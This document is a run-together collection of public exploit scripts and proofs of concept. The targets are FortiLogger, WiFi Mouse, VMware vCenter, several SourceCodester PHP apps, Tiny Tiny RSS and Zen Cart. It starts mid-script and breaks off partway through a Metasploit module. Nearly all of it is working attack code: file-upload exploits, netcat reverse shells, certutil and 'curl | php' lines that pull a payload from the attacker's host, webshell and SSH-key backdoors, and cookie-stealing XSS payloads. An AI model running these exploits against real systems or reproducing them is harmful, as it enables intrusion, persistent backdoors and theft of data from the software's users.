elif 'password' in args and args['password']: passwords = [args['password']] else: passwords = ['wrong'] # Check each valid login combination check_logins(args['RHOSTS'], args['rport'], args['targeturi'], domain, usernames, passwords, int(args['timeout']), user_agent) if __name__ == '__main__': module.run(metadata, run)

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::EXE prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'FortiLogger Arbitrary File Upload Exploit', 'Description' => %q{ This module exploits an unauthenticated arbitrary file upload via insecure POST request. It has been tested on version 4.4.2.2 in Windows 10 Enterprise. }, 'License' => MSF_LICENSE, 'Author' => [ 'Berkan Er <[email protected]>' # Vulnerability discovery, PoC and Metasploit module ], 'References' => [ ['CVE', '2021-3378'], ['URL', 'https://erberkan.github.io/2021/cve-2021-3378/'] ], 'Platform' => ['win'], 'Privileged' => false, 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ [ 'FortiLogger - 4.4.2.2', { 'Platform' => 'win' } ], ], 'DisclosureDate' => '2021-02-26', 'DefaultTarget' => 0 ) ) register_options( [ Opt::RPORT(5000), OptString.new('TARGETURI', [true, 'The base path to the FortiLogger', '/']) ], self.class ) end def check_product_info res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'), 'method' => 'POST', 'data' => '', 'headers' => { 'Accept' => 'application/json, text/javascript, */*; q=0.01', 'Accept-Language' => 'en-US,en;q=0.5', 'Accept-Encoding' => 'gzip, deflate', 'X-Requested-With' => 'XMLHttpRequest' } ) return res end def check begin res = check_product_info if res && res.code == 200 if JSON.parse(res.body)['Version'] == '4.4.2.2' Exploit::CheckCode::Vulnerable else Exploit::CheckCode::Safe end end end end def create_payload Msf::Util::EXE.to_exe_asp(generate_payload_exe).to_s end def exploit begin print_good('Generate Payload !') data = create_payload boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}" post_data = "--#{boundary}\r\n" post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"b3r.asp\"\r\n" post_data << "Content-Type: image/png\r\n" post_data << "\r\n#{data}\r\n" post_data << "--#{boundary}\r\n" res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'), 'ctype' => "multipart/form-data; boundary=#{boundary}", 'data' => post_data, 'headers' => { 'Accept' => 'application/json', 'Accept-Language' => 'en-US,en;q=0.5', 'X-Requested-With' => 'XMLHttpRequest' } ) if res && res.code == 200 if JSON.parse(res.body)['Message'] == 'Error in saving file' print_error('Error for upload payload..') else print_good('Payload has been uploaded !') handler print_status('Executing payload...') send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'), 'method' => 'GET' }, 5) end end end end end

# Exploit Title: WiFi Mouse 1.7.8.5 - Remote Code Execution # Date: 25-02-2021 # Author: H4rk3nz0 # Vendor Homepage: http://necta.us/ # Software Link: http://wifimouse.necta.us/#download # Version: 1.7.8.5 # Tested on: Windows Enterprise Build 17763 # Desktop Server software used by mobile app has PIN option which does not to prevent command input. # Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input. #!/usr/bin/python from socket import socket, AF_INET, SOCK_STREAM from time import sleep import sys import string target = socket(AF_INET, SOCK_STREAM) port = 1978 try: rhost = sys.argv[1] lhost = sys.argv[2] payload = sys.argv[3] except: print("USAGE: python " + sys.argv[0]+ " <target-ip> <local-http-server-ip> <payload-name>") exit() characters={ "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e", "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a", "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e", "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a", "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30", " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c", ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a", "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e", "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"} def openCMD(): target.sendto("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a".decode("hex"), (rhost,port)) # openfile /C/Windows/System32/cmd.exe def SendString(string): for char in string: target.sendto(("7574663820" + characters[char] + "0a").decode("hex"),(rhost,port)) # Sends Character hex with packet padding sleep(0.03) def SendReturn(): target.sendto("6b657920203352544e".decode("hex"),(rhost,port)) # 'key 3RTN' - Similar to 'Remote Mouse' mobile app sleep(0.5) def exploit(): print("[+] 3..2..1..") sleep(2) openCMD() print("[+] *Super fast hacker typing*") sleep(1) SendString("certutil.exe -urlcache -f http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload) SendReturn() print("[+] Retrieving payload") sleep(3) SendString("C:\\Windows\\Temp\\" + payload) SendReturn() print("[+] Done! Check Your Listener?") def main(): target.connect((rhost,port)) exploit() target.close() exit() if __name__=="__main__": main()

# Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload # Date: 2021-02-27 # Exploit Author: Photubias # Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html # Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517) # Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds # CVE: CVE-2021-21972 #!/usr/bin/env python3 ''' Copyright 2021 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. File name CVE-2021-21972.py written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be CVE-2021-21972 is an unauthenticated file upload and overwrite, exploitation can be done via SSH public key upload or a webshell The webshell must be of type JSP, and its success depends heavily on the specific vCenter version # Manual verification: https://<ip>/ui/vropspluginui/rest/services/checkmobregister # A white page means vulnerable # A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet) # Notes: # * On Linux SSH key upload is always best, when SSH access is possible & enabled # * On Linux the upload is done as user vsphere-ui:users # * On Windows the upload is done as system user # * vCenter 6.5 <=7515524 does not contain the vulnerable component "vropspluginui" # * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload This is a native implementation without requirements, written in Python 3. Works equally well on Windows as Linux (as MacOS, probably ;-) Features: vulnerability checker + exploit ''' import os, tarfile, sys, optparse, requests requests.packages.urllib3.disable_warnings() lProxy = {} SM_TEMPLATE = b'''<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <env:Body> <RetrieveServiceContent xmlns="urn:vim25"> <_this type="ServiceInstance">ServiceInstance</_this> </RetrieveServiceContent> </env:Body> </env:Envelope>''' sURL = sFile = sRpath = sType = None def parseArguments(options): global sURL, sFile, sType, sRpath, lProxy if not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.') sURL = options.url if sURL[-1:] == '/': sURL = sURL[:-1] if not sURL[:4].lower() == 'http': sURL = 'https://' + sURL sFile = options.file if not os.path.exists(sFile): exit('[-] File not found: ' + sFile) sType = 'ssh' if options.type: sType = options.type if options.rpath: sRpath = options.rpath else: sRpath = None if options.proxy: lProxy = {'https': options.proxy} def getVersion(sURL): def getValue(sResponse, sTag = 'vendor'): try: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0] except: pass return '' oResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE) #print(oResponse.text) if oResponse.status_code == 200: sResult = oResponse.text if not 'VMware' in getValue(sResult, 'vendor'): exit('[-] Not a VMware system: ' + sURL) else: sName = getValue(sResult, 'name') sVersion = getValue(sResult, 'version') # e.g. 7.0.0 sBuild = getValue(sResult, 'build') # e.g. 15934073 sFull = getValue(sResult, 'fullName') print('[+] Identified: ' + sFull) return sVersion, sBuild exit('[-] Not a VMware system: ' + sURL) def verify(sURL): #return True sURL += '/ui/vropspluginui/rest/services/uploadova' try: oResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5) except: exit('[-] System not available: ' + sURL) if oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely else: return False def createTarLin(sFile, sType, sVersion, sBuild, sRpath = None): def getResourcePath(): oResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5) return oResponse.text.split('static/')[1].split('/')[0] oTar = tarfile.open('payloadLin.tar','w') if sRpath: ## version & build not important if sRpath[0] == '/': sRpath = sRpath[1:] sPayloadPath = '../../' + sRpath oTar.add(sFile, arcname=sPayloadPath) oTar.close() return 'absolute' elif sType.lower() == 'ssh': ## version & build not important sPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys' oTar.add(sFile, arcname=sPayloadPath) oTar.close() return 'ssh' elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631): ## vCenter 6.5/6.7 < 13010631, just this location with a subnumber sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile) print('[!] Selected uploadpath: ' + sPayloadPath[5:]) for i in range(112): oTar.add(sFile, arcname=sPayloadPath % i) oTar.close() return 'webshell' elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631): ## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/<thefile> sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile) print('[!] Selected uploadpath: ' + sPayloadPath[5:]) oTar.add(sFile, arcname=sPayloadPath) oTar.close() return 'backdoor' else: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0): ## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/<thefile>) sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile) print('[!] Selected uploadpath: ' + sPayloadPath[5:]) oTar.add(sFile, arcname=sPayloadPath) oTar.close() return 'backdoor' def createTarWin(sFile, sRpath = None): ## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows if sRpath: if sRpath[0] == '/': sRpath = sRpath[:1] sPayloadPath = '../../' + sRpath else: sPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile) oTar = tarfile.open('payloadWin.tar','w') oTar.add(sFile, arcname=sPayloadPath) oTar.close() def uploadFile(sURL, sUploadType, sFile): #print('[!] Uploading ' + sFile) sFile = os.path.basename(sFile) sUploadURL = sURL + '/ui/vropspluginui/rest/services/uploadova' arrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')} ## Linux oResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy) if oResponse.status_code == 200: if oResponse.text == 'SUCCESS': print('[+] Linux payload uploaded succesfully.') if sUploadType == 'ssh': print('[+] SSH key installed for user \'vsphere-ui\'.') print(' Please run \'ssh vsphere-ui@' + sURL.replace('https://','') + '\'') return True elif sUploadType == 'webshell': sWebshell = sURL + '/ui/resources/' + sFile #print('testing ' + sWebshell) oResponse = requests.get(sWebshell, verify=False, proxies = lProxy) if oResponse.status_code != 404: print('[+] Webshell verified, please visit: ' + sWebshell) return True elif sUploadType == 'backdoor': sWebshell = sURL + '/ui/resources/' + sFile print('[+] Backdoor ready, please reboot or wait for a reboot') print(' then open: ' + sWebshell) else: ## absolute pass ## Windows arrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')} oResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy) if oResponse.status_code == 200: if oResponse.text == 'SUCCESS': print('[+] Windows payload uploaded succesfully.') if sUploadType == 'backdoor': print('[+] Absolute upload looks OK') return True else: sWebshell = sURL + '/statsreport/' + sFile oResponse = requests.get(sWebshell, verify=False, proxies = lProxy) if oResponse.status_code != 404: print('[+] Webshell verified, please visit: ' + sWebshell) return True return False if __name__ == "__main__": usage = ( 'Usage: %prog [option]\n' 'Exploiting Windows & Linux vCenter Server\n' 'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \'\'\n' 'Note1: Since the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\n' 'Note2: Windows is the most vulnerable, but less mostly deprecated anyway') parser = optparse.OptionParser(usage=usage) parser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1') parser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell') parser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh') parser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile') parser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1:8080') (options, args) = parser.parse_args() parseArguments(options) ## Verify if verify(sURL): print('[+] Target vulnerable: ' + sURL) else: exit('[-] Target not vulnerable: ' + sURL) ## Read out the version sVersion, sBuild = getVersion(sURL) if sRpath: print('[!] Ready to upload your file to ' + sRpath) elif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \'' + sFile + '\'') else: print('[!] Ready to upload webshell \'' + sFile + '\'') sAns = input('[?] Want to exploit? [y/N]: ') if not sAns or not sAns[0].lower() == 'y': exit() ## Create TAR file sUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath) if not sUploadType == 'ssh': createTarWin(sFile, sRpath) ## Upload and verify uploadFile(sURL, sUploadType, sFile) ## Cleanup os.remove('payloadLin.tar') os.remove('payloadWin.tar')

# Exploit Title: Online Catering Reservation System 1.0 - Unauthenticated Remote Code Execution # Date: 28-02-2021 # Exploit Author: Christian Vierschilling # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/11355/online-catering-reservation.html # Version: 1.0 # Tested on: PHP 7.4.14, Linux x64_x86 # --- Description --- # #The web application allows for an unauthenticated file upload which can result in a Remote Code Execution. # --- Proof of concept --- # #!/usr/bin/python3 import random import sys import requests from requests_toolbelt.multipart.encoder import MultipartEncoder def file_upload(target_ip, attacker_ip, attacker_port): random_file_name = str(random.randint(100000, 999999)) + "revshell.php" revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port) m = MultipartEncoder(fields={'id': '1337', 'menu':'PWN', 'cat': '1337', 'subcat':'PWN','desc':'PWN','price':'13.37', 'image': (random_file_name, revshell_string, 'application/x-php'),'update':''}) print("(+) Uploading php reverse shell..") r1 = requests.post('http://{}/reservation/admin/menu_update.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type}) if "Successfully updated menu details!" in r1.text: print("(+) File upload seems to have been successful!") return random_file_name else: print("(-) Oh no, file upload seems to have failed.. quitting.") exit() def trigger_shell(target_ip, filename): url = 'http://{}/reservation/images/{}'.format(target_ip, filename) print("(+) Now trying to trigger our shell by requesting {} ..".format(url)) r2 = requests.get(url) return None def main(): if len(sys.argv) != 4: print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0]) print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0]) sys.exit(-1) target_ip = sys.argv[1] attacker_ip = sys.argv[2] attacker_port = sys.argv[3] uploaded_filename = file_upload(target_ip, attacker_ip, attacker_port) trigger_shell(target_ip, uploaded_filename) print("\n(+) done!") if __name__ == "__main__": main()

# Exploit Title: Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated) # Date: 28-02-2021 # Exploit Author: Christian Vierschilling # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14728/covid-19-contact-tracing-system-web-app-qr-code-scanning-using-php-source-code.html # Version: 1.0 # Tested on: PHP 7.4.14, Linux x64_x86 # --- Description --- # # The web application allows for an unauthenticated file upload which can result in a Remote Code Execution. # --- Proof of concept --- # #!/usr/bin/python3 import random import sys import requests from requests_toolbelt.multipart.encoder import MultipartEncoder def file_upload(target_ip, attacker_ip, attacker_port): random_file_name = str(random.randint(100000, 999999)) + "revshell.php" revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port) m = MultipartEncoder(fields={'name': 'PWNED', 'img': (random_file_name, revshell_string, 'application/x-php')}) print("(+) Uploading php reverse shell..") r1 = requests.post('http://{}/cts_qr/classes/SystemSettings.php?f=update_settings'.format(target_ip), data=m, headers={'Content-Type': m.content_type}) if r1.text == '1': print("(+) File upload seems to have been successful!") return None else: print("(-) Oh no, the file upload seems to have failed!") exit() def trigger_shell(target_ip): print("(+) Now trying to trigger our shell..") #The file we uploaded previously is expected to be an image that the web app tries to embed into the login page. #So by requesting the login page, our reverse shell php file will get triggered automatically. We dont even need to calculate the random bits of its new name. r2 = requests.get('http://{}/cts_qr/login.php'.format(target_ip)) return None def main(): if len(sys.argv) != 4: print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0]) print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0]) sys.exit(-1) target_ip = sys.argv[1] attacker_ip = sys.argv[2] attacker_port = sys.argv[3] file_upload(target_ip, attacker_ip, attacker_port) trigger_shell(target_ip) print("\n(+) done!") if __name__ == "__main__": main()

# Exploit Title: Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting # Date: 2021-03-02 # Exploit Author: Praharsh Kumar Singh # Vendor Homepage: https://www.sourcecodester.com # Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html # Software: Web Based Quiz System # Version: 1.0 # Vulnerability Type: Cross-site Scripting # Vulnerability: Persistent/Stored XSS # Tested on: Parrot OS # Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe # in adding questions in options parameter affected from this vulnerability. # payload: </script><script >alert(document.cookie)</script> POST /onlinequiz_0/update.php?q=addqns&n=1&eid=603d2f766b0d0&ch=4 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 101 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/onlinequiz_0/dashboard.php?q=4&step=2&eid=603d2f766b0d0&n=1 Cookie: PHPSESSID=icctgctoho6nlqc6cbp8bftkeh Upgrade-Insecure-Requests: 1 Sec-GPC: 1 qns1=1&11=1&12=1&13=%3C%2Fscript%3E%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&14=1&ans1=c POC: # go to url http://localhost:8080/admin.php # login and add question # then put the above payload in MCQ options parameter # then fill the remaining details # then click add # go to url http://localhost:8080/login.php # then login to user account # then attempt the quiz while attempting the quiz xss pop up there..!

# Exploit Title: Tiny Tiny RSS - Remote Code Execution # Date: 21/09/2020 # Exploit Author: Daniel Neagaru & Benjamin Nadarević # Blog post: https://www.digeex.de/blog/tinytinyrss/ # Software Link: https://git.tt-rss.org/fox/tt-rss # Version: all before 2020-09-16 # Commit with the fixes: https://git.tt-rss.org/fox/tt-rss/commit/c3d14e1fa54c7dade7b1b7955575e2991396d7ef # Tested on: default docker installation method # CVE : CVE-2020-25787 #!/usr/bin/env python3 from sys import argv import urllib.parse as ul import base64 def CustomFcgi( filename, output, backdoor): length=len(output)+len(backdoor)+64 char=chr(length) data = "\x0f\x10SERVER_SOFTWAREgo / fcgiclient \x0b\tREMOTE_ADDR127.0.0.1\x0f\x08SERVER_PROTOCOLHTTP/1.1\x0e" + chr(len(str(length))) data += "CONTENT_LENGTH" + str(length) + "\x0e\x04REQUEST_METHODPOST\tKPHP_VALUEallow_url_include = On\n" data += "disable_functions = \nauto_prepend_file = php://input\x0f" + chr(len(filename)) +"SCRIPT_FILENAME" + filename + "\r\x01DOCUMENT_ROOT/" temp1 = chr(len(data) // 256) temp2 = chr(len(data) % 256) temp3 = chr(len(data) % 8) end = str("\x00"*(len(data)%8)) + "\x01\x04\x00\x01\x00\x00\x00\x00\x01\x05\x00\x01\x00" + char + "\x04\x00" end += "<?php file_put_contents('" + output + "',base64_decode("+ "'"+str(backdoor.decode('ascii'))+"')"+");die('executed');?>\x00\x00\x00\x00" start = "\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\x04\x00\x01" + temp1 + temp2 + temp3 + "\x00" payload = start + data + end def get_payload(payload): finalpayload = ul.quote_plus(payload, encoding="latin-1").replace("+","%20").replace("%2F","/") return finalpayload return "gopher://localhost:9000/_"+get_payload(get_payload(payload)) TTRSS_PATH = "/var/www/html/tt-rss/" BACKDOOR_CODE = """ <?php echo "success\n"; echo system($_GET['cmd']); ?> """ feed_file = open("malicious_RCE_feed.xml",'w') filename = TTRSS_PATH + "config.php" output = TTRSS_PATH + "backdoor.php" backdoor_code = base64.b64encode(BACKDOOR_CODE.encode("ascii")) rce = "public.php?op=pluginhandler&plugin=af_proxy_http&pmethod=imgproxy&url=" + CustomFcgi(filename, output, backdoor_code) + "&text" feed ="""<?xml version="1.0" encoding="UTF-8" ?> <rss version="2.0"> <channel> <title>Exploit demo - rce</title> <link></link> <description>You are getting infected :(</description> <item> <title> Check if there is backdoor.php</title> <link><![CDATA[backdoor.php?cmd=id&bypass_filter=://]]></link> <description> <![CDATA[ Dummy text <img src="{}"> ]]> </description> </item> </channel> </rss> """.format(rce) feed_file.write(feed) feed_file.close()

# Exploit Title: Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting # Date: 2021-03-02 # Exploit Author: P.Naveen Kumar # Vendor Homepage: https://www.sourcecodester.com # Software Download Link : https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html # Software : Web Based Quiz System # Version : 1.0 # Vulnerability Type : Cross-site Scripting # Vulnerability : Persistent/Stored XSS # Tested on: Windows 10 Pro # Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe # in registration form in name parameter affected from this vulnerability. # payload: <script>alert(document.cookie)</script> # HTTP POST request POST http://localhost:8080/quiz/register.php HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------283640616528311462411171270636 Content-Length: 690 Origin: http://localhost:8080 Connection: keep-alive Referer: http://localhost:8080/quiz/register.php Cookie: PHPSESSID=ptujqhbkupjsqjkqs7tjhnb5er Upgrade-Insecure-Requests: 1 -----------------------------283640616528311462411171270636 Content-Disposition: form-data; name="name" <script>alert(document.cookie)</script> -----------------------------283640616528311462411171270636 Content-Disposition: form-data; name="email" [email protected] -----------------------------283640616528311462411171270636 Content-Disposition: form-data; name="password" Hacker -----------------------------283640616528311462411171270636 Content-Disposition: form-data; name="college" hello -----------------------------283640616528311462411171270636 Content-Disposition: form-data; name="submit" -----------------------------283640616528311462411171270636-- POC: # go to url http://localhost:8080/quiz/register.php # then you have to fill the above payload in name/username parameter # then fill the remaining details # then click submit # then login to user account # then attempt any one quiz after attempting go to ranking section then # you can see xss pop up there..!

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## ### # # # This exploit write payload in database and trig to command # a bug in an zencart v1.5.7b web application # ### class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' => 'zencart authenticated remote code execution exploit', 'Description' => %q( This exploit module execution os command in zencart. ), 'License' => MSF_LICENSE, 'Author' => ['Mucahit Saratar <[email protected]>'], # msf module & research & poc 'References' =>[ [ 'OSVDB', '' ], [ 'EDB', '' ], [ 'URL', 'https://github.com/MucahitSaratar/zencart_auth_rce_poc'], [ 'CVE', '2021-3291'] ], 'Platform' => 'php', 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ ['Automatic', { }] ], 'DisclosureDate' => '2021-01-22', 'DefaultTarget' => 0 ) ) register_options( [ Opt::RPORT(80), OptString.new('USERNAME', [ true, 'User to login with', 'admin']), OptString.new('PASSWORD', [ true, 'Password to login with', '']), OptString.new('BASEPATH', [ true, 'zencart base path eg. /zencart/', '/']), OptString.new('MODULE', [ true, 'Module name. eg. payment,shipping,ordertotal,plugin_manager', 'payment']), OptString.new('SETTING', [ true, 'setting name. eg. freecharger for payment', 'freecharger']), OptString.new('TARGETURI', [ true, 'Admin Panel Path', '/cracK-Fqu-trasH/']) ], self.class ) end def start_server ssltut = false if datastore["SSL"] ssltut = true datastore["SSL"] = false end start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) print_status("payload is on #{get_uri}") @adresim = get_uri datastore['SSL'] = true if ssltut end def on_request_uri(cli, request) print_good('First stage is executed ! Sending 2nd stage of the payload') send_response(cli, payload.encoded, {'Content-Type'=>'text/html'}) end def tabanyol datastore["BASEPATH"] end def isim datastore["USERNAME"] end def parola datastore["PASSWORD"] end def login #"index.php?cmd=login&camefrom=index.php" res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"), 'vars_get' => { 'cmd' => 'login', 'camefrom' => 'index.php' }) # <input type="hidden" name="securityToken" value="c77815040562301dafaef1c84b7aa3f3" /> unless res fail_with(Failure::Unreachable, "Access web application failure") end if res.code != 200 fail_with(Failure::Unreachable, "we not have 200 response") end if !res.get_cookies.empty? @cookie = res.get_cookies @csrftoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten[0] || '' if @csrftoken.empty? fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.') end vprint_good("login Csrf token: "+@csrftoken) end res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php?cmd=login&camefrom=index.php"), 'cookie' => @cookie, 'vars_post' => { 'securityToken' => @csrftoken, 'action' => "do"+@csrftoken, 'admin_name' => isim, 'admin_pass' => parola }) if res.code != 302 fail_with(Failure::UnexpectedReply, 'There is no CSRF token at HTTP response.') end true end def check unless login fail_with(Failure::UnexpectedReply, 'Wrong credentials') return CheckCode::NotVulnerable('Wrong credentials') end print_good("We loged in") Exploit::CheckCode::Vulnerable CheckCode::Vulnerable('Authenticated successfully') end def exploit check start_server sleep(4) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"), 'vars_get' => { 'cmd' => 'modules', 'set' => datastore["MODULE"], 'module' => datastore["SETTING"], 'action' => 'edit' }, 'cookie' => @cookie ) if res.code != 200 fail_with(Failure::UnexpectedReply, 'Something Wron. code must be 200') end # <input type="hidden" name="securityToken" value="09068bece11256d03ba55fd2d1f9c820" /> if res && res.code == 200 @formtoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten[0] || '' if @formtoken.empty? fail_with(Failure::UnexpectedReply, 'securitytoken not in response') end #print_good(@formtoken) # <form name="modules" @radiolar = res.body.scan(/<input type="radio" name="configuration\[(.*)\]" value="True"/) @selectler = res.body.scan(/<select rel="dropdown" name="configuration\[(.*)\]" class="form-control">/) @textarr = res.body.scan(/<input type="text" name="configuration\[(.*)\]" value="0" class="form-control" \/>/) @secme = {} @secme["securityToken"] = @formtoken for @a in @radiolar @secme["configuration[#{@a[0]}]"] = "True','F'); echo `curl #{@adresim} |php`; //" end for @a in @selectler @secme["configuration[#{@a[0]}]"] = "0" end for @a in @textarr @secme["configuration[#{@a[0]}]"] = "0" end print_good(@secme.to_s) res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"), 'cookie' => @cookie, 'vars_get' => { 'cmd' => 'modules', 'set' => datastore["MODULE"], 'module' => datastore["SETTING"], 'action' => 'save' }, 'vars_post' => @secme ) res = send_request_cgi( 'method' => 'GET', 'uri' => 